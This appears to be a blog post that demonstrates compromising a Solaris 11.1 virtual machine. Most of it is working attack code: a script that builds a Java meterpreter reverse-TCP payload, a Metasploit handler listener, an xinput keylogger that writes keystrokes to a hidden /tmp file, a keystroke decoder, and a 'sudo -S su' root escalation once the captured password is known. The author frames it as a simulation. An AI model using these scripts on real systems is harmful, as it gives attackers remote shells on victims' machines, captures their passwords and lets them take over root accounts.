Just to follow up on the different OS scenarios from the previous posts, here is a test done on Solaris 11.1 x86 in Qemu KVM. Setup is nothing special, standard way of creating hdd qcow2 image, and launching the VM. Here is my script that does that:
kvm -m 1024 -vga vmware -drive file=hdd.img,cache=none,index=1 -net nic,model=rtl8139,macaddr=10:1f:74:56:47:58 -net user
Once the system is up, setup a meterpreter java listener on the host and generate a java payload for the Solaris guest. I have used the same scripts like for OSX because of the meterpreter Java
clear echo "************************************************************" echo " Automatic shellcode generator - FOR METASPLOIT " echo "************************************************************" echo -e "What IP are we gonna use ? \c" read IP echo -e "What Port Number are we gonna listen to? : \c" read port ./msfpayload java/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R > test.jar mkdir ShellCode mv test.jar ShellCode echo "test.jar generated in ShellCode folder..."
The listener is identical:
#!/bin/bash clear echo "***************************************************************" echo " Automatic shellcode generator - FOR METASPLOIT " echo "***************************************************************" echo -e "What Port Number are we gonna listen to? : \c" read port echo " starting the meterpreter listener.." ./msfcli exploit/multi/handler PAYLOAD=java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=$port E
The generated jar file should be placed on the guest Solaris and executed for demonstration. Again this is just a simulation, nothing that a normal savvy admin would do :) So lets just pretend the file is there and the user “double clicks it”
The java meterpreter payload works as expected and we get a reverse shell on our host. Lets try and exploit the Xorg xinput to get some user keyboard input.
In order to exploit the xinput keylogging capability I had to change just a little the initial linux xinput keylog script like so:
#!/bin/bash export DISPLAY=:0.0 xinput list echo -e "KBD ID ?" read kbd xmodmap -pke > /tmp/.xkey.log script | xinput test $kbd >> /tmp/.xkey.log & exit
The script command on Solaris does not accept the -c parameter like in various distributions of Linux so we cannot tell what command to run. Here we have this little exception because when stdout is not a terminal (we redirect to .xkey.log) output is buffered in 4k chunks. If you CTRL+C the buffer gets lost, so we just need to exit the shell once the logger starts and wait for user input on the keyboard. The file .xkey.log will grow in 4k chunks at a time.
After some time, the .xkey.log gets downloaded from /tmp and decoded by the following script:
#!/bin/sh
cat .xkey.log | grep keycode > xmodmap.pke
cat .xkey.log | grep 'key p' > xlog
rm -f .xkey.log
#Generating some Python to do the decoding
echo 'import re, collections, sys' > decoder.py
echo 'from subprocess import *' >> decoder.py
echo 'def keyMap():' >> decoder.py
echo ' table = open("xmodmap.pke")' >> decoder.py
echo ' key = []' >> decoder.py
echo ' for line in table:' >> decoder.py
echo " m = re.match('keycode +(\d+) = (.+)', line.decode())" >> decoder.py
echo ' if m and m.groups()[1]:' >> decoder.py
echo ' key.append(m.groups()[1].split()[0]+"_____"+m.groups()[0])' >> decoder.py
echo ' return key' >> decoder.py
echo 'def printV(letter):' >> decoder.py
echo ' key=keyMap();' >> decoder.py
echo ' for i in key:' >> decoder.py
echo ' if str(letter) == i.split("_____")[1]:' >> decoder.py
echo ' return i.split("_____")[0]' >> decoder.py
echo ' return letter' >> decoder.py
echo 'if len(sys.argv) < 2:' >> decoder.py
echo ' print "Usage: %s FILE" % sys.argv[0];' >> decoder.py
echo ' exit();' >> decoder.py
echo 'else:' >> decoder.py
echo ' f = open(sys.argv[1])' >> decoder.py
echo ' lines = f.readlines()' >> decoder.py
echo ' f.close()' >> decoder.py
echo ' for line in lines:' >> decoder.py
echo " m = re.match('key press +(\d+)', line)" >> decoder.py
echo ' if m:' >> decoder.py
echo ' keycode = m.groups()[0]' >> decoder.py
echo ' print (printV(keycode))' >> decoder.py
echo 'Please see LOG-keylogger for the output......'
python decoder.py xlog > LOG
sed ':a;N;$!ba;s/\n/ /g' LOG > LOG-keylogger
rm -f LOG
rm -f xmodmap.pke
rm -f decoder.py
rm -f xlog
cat LOG-keylogger
Once you have the root password :) you can do the following from the Meterpreter shell in order to elevate to root:
sudo -S su
And here is a video demonstration of the above process:
